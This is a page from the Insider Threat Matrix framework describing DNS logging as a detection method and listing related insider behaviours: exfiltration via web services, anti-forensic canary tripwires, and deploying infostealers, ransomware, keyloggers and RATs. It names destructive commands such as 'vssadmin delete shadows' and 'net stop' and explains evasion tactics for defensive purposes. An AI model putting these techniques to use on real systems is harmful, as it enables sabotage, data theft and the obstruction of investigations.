ITM is an open framework - Submit your contributions now.

Insider Threat Matrix™Insider Threat Matrix™
  • ID: DT051
  • Created: 08th June 2024
  • Updated: 17th June 2024
  • Platforms: Windows, Linux, MacOS,
  • Contributor: The ITM Team

DNS Logging

Logging DNS requests made by corporate devices can assist with identifying what web resources a system has attempted to or successfully accessed.

Sections

ID Name Description
ME006Web Access

A subject can access the web with an organization device.

IF001Exfiltration via Web Service

A subject uses an existing, legitimate external Web service to exfiltrate data

IF027Installing Malicious Software

The subject deliberately or inadvertently introduces malicious software (commonly referred to as malware) into the organization’s environment. This may occur via manual execution, automated dropper delivery, browser‑based compromise, USB usage, or sideloading through legitimate processes. Malicious software includes trojans, keyloggers, ransomware, credential stealers, remote access tools (RATs), persistence frameworks, or other payloads designed to cause harm, exfiltrate data, degrade systems, or maintain unauthorized control.

 

Installation of malicious software represents a high-severity infringement, regardless of whether the subject's intent was deliberate or negligent. In some cases, malware introduction is the culmination of prior behavioral drift (e.g. installing unapproved tools or disabling security controls), while in others it may signal malicious preparation or active compromise.

 

This Section is distinct from general “Installing Unapproved Software”, which covers non‑malicious or policy-violating tools. Here, the software itself is malicious in purpose or impact, even if delivered under benign pretenses.

ME006.001Webmail

A subject can access personal webmail services in a browser.

ME006.002Cloud Storage

A subject can access personal cloud storage in a browser.

ME006.003Inappropriate Websites

A subject can access websites containing inappropriate content.

ME006.004Note-Taking Websites

A subject can access external note-taking websites (Such as Evernote).

ME006.005Messenger Services

A subject can access external messenger web-applications with the ability to transmit data and/or files.

IF001.001Exfiltration via Cloud Storage

A subject uses a cloud storage service, such as Dropbox, OneDrive, or Google Drive to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

  • hxxps://www.dropbox[.]com
  • hxxps://drive.google[.]com
  • hxxps://onedrive.live[.]com
  • hxxps://mega[.]nz
  • hxxps://www.icloud[.]com/iclouddrive
  • hxxps://www.pcloud[.]com
ME006.006Code Repositories

A subject can access websites used to access or manage code repositories.

AF004.001Clear Chrome Artifacts

A subject clears Google Chrome browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.003Clear Firefox Artifacts

A subject clears Mozzila Firefox browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.002Clear Edge Artifacts

A subject clears Microsoft Edge browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

ME006.007Text Storage Websites

A subject can access external text storage websites, such as Pastebin.

AF018.003Canary Tokens

A subject uses files with canary tokens as a tripwire mechanism to detect the presence of security personnel or investigation activities within a compromised environment. This method involves strategically placing files embedded with special identifiers (canary tokens) that trigger alerts when accessed. For example:

 

The subject creates files containing canary tokens—unique identifiers that generate an alert when they are accessed, opened, or modified. These files can appear as regular documents, logs, configurations, or other items that might attract the attention of an investigator during a security response.

 

The subject strategically places these files in various locations within the environment:

  • Endpoints: Files with canary tokens are stored in directories where digital forensics or malware analysis is likely to occur, such as system logs, user data directories, or registry entries.
  • Cloud Storage: The files are uploaded to cloud storage buckets, virtual machines, or application databases where security teams might search for indicators of compromise.
  • Network Shares: Shared drives and network locations where forensic investigators or security tools may perform scans.

 

Once in place, the canary token within each file serves as a silent tripwire. The token monitors for access and automatically triggers an alert if an action is detected:

  • Access Detection: If a security tool, administrator, or investigator attempts to open, modify, or copy the file, the embedded canary token sends an alert to an external server controlled by the subject.
  • Network Traffic: The token can initiate an outbound network request (e.g., HTTP, DNS) to a specified location, notifying the subject of the exact time and environment where the access occurred.
  • Behavior Analysis: The subject might include multiple canary files, each with unique tokens, to identify the pattern of investigation, such as the sequence of directories accessed or specific file types of interest to the security team.

 

Upon receiving an alert from a triggered canary token, the subject can take immediate steps to evade detection:

  • Alert the Subject: The canary token sends a covert signal to the subject's designated server or communication channel, notifying them of the potential investigation.
  • Halt Malicious Activity: The subject can use this warning to suspend ongoing malicious actions, such as data exfiltration or command-and-control communications, to avoid further detection.
  • Clean Up Evidence: Scripts can be triggered to delete or alter logs, remove incriminating files, or revert system configurations to their original state, complicating any forensic investigation.
  • Feign Normalcy: The subject can restore or disguise compromised systems to appear as though nothing suspicious has occurred, minimizing signs of tampering.

 

By using files with canary tokens as tripwires, a subject can gain early warning of investigative actions and respond quickly to avoid exposure. This tactic allows them to outmaneuver standard security investigations by leveraging silent alerts that inform them of potential security team activity.

IF001.002Exfiltration via Code Repository

A subject uses a code repository service, such as GitHub, to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

  • hxxps://github[.]com
  • hxxps://gitlab[.]com
  • hxxps://bitbucket[.]org
  • hxxps://sourceforge[.]net
  • hxxps://aws.amazon[.]com/codecommit
IF001.005Exfiltration via Note-Taking Web Services

A subject uploads confidential organization data to a note-taking web service, such as Evernote. The subject can then access the confidential data outside of the organization from another device. Examples include (URLs have been sanitized):

  • hxxps://www.evernote[.]com
  • hxxps://keep.google[.]com
  • hxxps://www.notion[.]so
  • hxxps://www.onenote[.]com
  • hxxps://notebook.zoho[.]com
IF001.003Exfiltration via Text Storage Sites

A subject uses a text storage service, such as Pastebin, to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

  • hxxps://pastebin[.]com
  • hxxps://hastebin[.]com
  • hxxps://privatebin[.]net
  • hxxps://controlc[.]com
  • hxxps://rentry[.]co
  • hxxps://dpaste[.]org
IF010.002Exfiltration via Personal Email

A subject exfiltrates information using a mailbox they own or have access to, either via software or webmail. They will access the conversation at a later date to retrieve information on a different system.

PR026.002Remote Desktop Web Access

The subject initiates or configures access to a system using Remote Desktop or Remote Assistance via a web browser interface, often through third-party tools or services (e.g., LogMeIn, AnyDesk, Chrome Remote Desktop, Microsoft RD Web Access). This behavior may indicate preparatory actions to facilitate unauthorized remote access, either for a co-conspirator, a secondary device, or future remote exfiltration. Unlike traditional RDP clients, browser-based remote access methods may bypass endpoint controls and often operate over HTTPS, making detection more difficult with traditional monitoring.

 

This method may be used when traditional RDP clients are blocked or monitored, or when the subject intends to evade installed software policies and gain access through externally hosted portals. While some web-based tools require agents to be installed on the target machine, others permit remote viewing or interaction without full installation, particularly when configured in advance.

IF001.007Exfiltration via Collaboration Platform

A subject uses a cloud collaboration platform, such as Slack, Google Docs, Atlassian Confluence, or Microsoft 365 Online, to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

 

  • hxxps://docs.google[.]com
    hxxps://*.slack[.]com (* represents a wildcard, where a workspace name would be present)
    hxxps://word.cloud[.]microsoft
    hxxps://excel.cloud[.]Microsoft
  • hxxps://powerpoint.cloud[.]Microsoft
  • hxxps://*.atlassian[.]net/wiki/ (* represents a wildcard, where a workspace name would be present)
IF009.007Installation of Unapproved Browser Extensions

The subject installs browser extensions on a managed device that have not been approved, vetted, or distributed via sanctioned organizational channels. These may include productivity tools, automation agents, data scrapers, content manipulators, or AI-enhanced interfaces. Installations typically originate from GitHub repositories, private developer sites, shared file storage, or sideloading tools that bypass enterprise browser controls.

 

Unapproved extensions introduce unmonitored execution environments directly into the subject’s browser, enabling silent access to sensitive web applications, stored credentials, and internal content. Many request expansive permissions (e.g., webRequest, cookies, tabs, clipboardRead) and operate with persistent background scripts that are difficult to detect through normal endpoint monitoring.

 

This behavior violates Acceptable Use Policies and, depending on the extension’s behavior, may also constitute unauthorized access, data exfiltration, or malware introduction. Some extensions—particularly those hosted on GitHub or distributed through Telegram groups or developer forums—have been found to contain obfuscated payloads, embedded credential harvesters, or cryptojacking modules.

 

Examples include:

 

  • Installing a GitHub-hosted ChatGPT sidebar extension that silently logs visited URLs and API keys used in developer consoles.
  • Deploying a YouTube downloader that injects scripts for ad click fraud or SEO manipulation.
  • Using a browser extension to auto-fill forms with personal data, which transmits data to offshore analytics servers.
  • Loading unpacked or custom extensions that disguise themselves as utilities but include base64-encoded malware installers.

 

While subjects may initially claim curiosity or productivity needs, repeated installation of unapproved extensions—especially after prior enforcement—may indicate normalization of risky behavior or active circumvention of controls.

ME001.001Access to Asset Past Termination

The subject accesses a corporate hardware asset, most commonly a laptop or corporate mobile device, after their employment has formally ended. This typically occurs due to gaps in deprovisioning, delayed hardware recovery, or the subject physically retaining the device despite offboarding procedures. Post-termination access may be opportunistic or intentional, and may precede or coincide with data exfiltration, sabotage, or unauthorized continuation of internal access.

 

This sub-section is relevant in cases where the hardware asset is no longer linked to an active identity in HR systems but remains technically functional and capable of network, VPN, or service access. Such access undermines the assumption that termination alone revokes operational capability and may point to procedural drift in IT, HR, or facilities handover workflows.

ME001.002Purchase and Use of Unmanaged Corporate Hardware

The subject purchases a laptop (or similar endpoint) using a corporate payment method but does so outside established procurement and provisioning processes. By bypassing IT and asset management workflows, the subject introduces a corporate-funded but unmanaged device into the environment.

 

Such devices often lack standard security controls—such as endpoint detection and response (EDR), encryption, configuration baselines, or patching—and may not be tracked in asset inventory systems. While the subject may rationalize the purchase as operationally necessary (e.g., urgency, convenience, or perceived lack of IT responsiveness), the result is a sanctioned but invisible device with the potential to bypass monitoring and governance controls.

 

This behavior undermines organizational asset control, complicates investigative attribution, and introduces unmanaged endpoints capable of accessing sensitive networks and data.

IF027.001Infostealer Deployment

The subject deploys credential-harvesting malware (commonly referred to as an infostealer) to extract sensitive authentication material or session artifacts from systems under their control. These payloads are typically configured to capture data from browser credential stores (e.g., Login Data SQLite databases in Chromium-based browsers), password vaults (e.g., KeePass, 1Password), clipboard buffers, Windows Credential Manager, or the Local Security Authority Subsystem Service (LSASS) memory space.

 

Infostealers may be executed directly via compiled binaries, staged through malicious document macros, or loaded reflectively into memory using PowerShell, .NET assemblies, or process hollowing techniques. Some variants are fileless and reside entirely in memory, while others create persistence via registry keys (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run) or scheduled tasks.

 

While often associated with external threat actors, insider deployment of infostealers allows subjects to bypass authentication safeguards, impersonate peers, or exfiltrate internal tokens for later use or sale. In cases where data is not immediately exfiltrated, local staging (e.g., in %AppData%, %Temp%, or encrypted containers) may indicate an intent to transfer data offline or deliver it via alternate channels.

IF027.002Ransomware Deployment

The subject deploys ransomware within the organization’s environment, resulting in the encryption, locking, or destructive alteration of organizational data, systems, or backups. Ransomware used by insiders may be obtained from public repositories, affiliate programs (e.g. RaaS platforms), or compiled independently using commodity builder kits. Unlike external actors who rely on phishing or remote exploitation, insiders often bypass perimeter controls by detonating ransomware from within trusted systems using local access.

 

Ransomware payloads are typically compiled as executables, occasionally obfuscated using packers or crypters to evade detection. Execution may be initiated via command-line, scheduled task, script wrapper, or automated loader. Encryption routines often target common file extensions recursively across accessible volumes, mapped drives, and cloud sync folders. In advanced deployments, the subject may disable volume shadow copies (vssadmin delete shadows) or stop backup agents (net stop) prior to detonation to increase impact.

 

In some insider scenarios, ransomware is executed selectively: targeting specific departments, shares, or systems, rather than broad detonation. This behavior may indicate intent to send a message, sabotage selectively, or avoid attribution. Payment demands may be issued internally, externally, or omitted entirely if disruption is the primary motive.

IF027.003Keylogger Deployment

The subject deploys software designed to record keystrokes entered on an endpoint to capture credentials, sensitive communications, internal documentation, or intellectual property. Keyloggers may be introduced as standalone binaries, embedded within otherwise legitimate tools, or configured through dual-use frameworks (e.g. C++ dropper with keylogging module). In insider scenarios, the deployment is typically local and deliberate, leveraging the subject’s physical access or assigned privileges to bypass existing controls.

 

Keyloggers operate in one of several modes:

 

  • Kernel-based: Install drivers or hook low-level keyboard input APIs (e.g. Kbdclass.sys) to intercept inputs pre-OS.
  • User-mode: Hook Windows APIs (SetWindowsHookEx, GetAsyncKeyState, GetForegroundWindow) to log input tied to active processes or windows.
  • Form grabbers: Intercept browser or GUI form submissions, often bypassing SSL/TLS encryption by logging data pre-submission.
  • Clipboard and screen scrapers: Supplement keylogging with capture of copied content and screenshots for contextual awareness.

 

Captured data is typically stored in encrypted local files (e.g. %TEMP%, %APPDATA%, or hidden directories), periodically exfiltrated via email, FTP, HTTP POST, or external storage.

IF027.004Remote Access Tool (RAT) Deployment

The subject deploys a Remote Access Tool (RAT): a software implant that provides covert, persistent remote control of an endpoint or server—enabling continued unauthorized access, monitoring, or post-employment re-entry. Unlike sanctioned remote administration platforms, RATs are deployed without organizational oversight and are often configured to obfuscate their presence, evade detection, or blend into legitimate activity.

 

RATs deployed by insiders may be off-the-shelf tools (e.g. njRAT, Quasar, Remcos), lightly modified open-source frameworks (e.g. Havoc, Pupy), or commercial-grade products repurposed for unsanctioned use (e.g. AnyDesk, TeamViewer in stealth mode). 

 

Functionality typically includes:

 

  • Full GUI or shell access
  • File system interaction
  • Screenshot and webcam capture
  • Credential harvesting
  • Process and registry manipulation
  • Optional keylogging and persistence modules

 

Deployment methods include manual installation, script-wrapped droppers, DLL side-loading, or execution via LOLBins (mshta, rundll32). Persistence is typically achieved through scheduled tasks, registry run keys, or disguised service installations. In some cases, the RAT may be configured to activate only during specific windows or respond to remote beacons, reducing exposure to detection.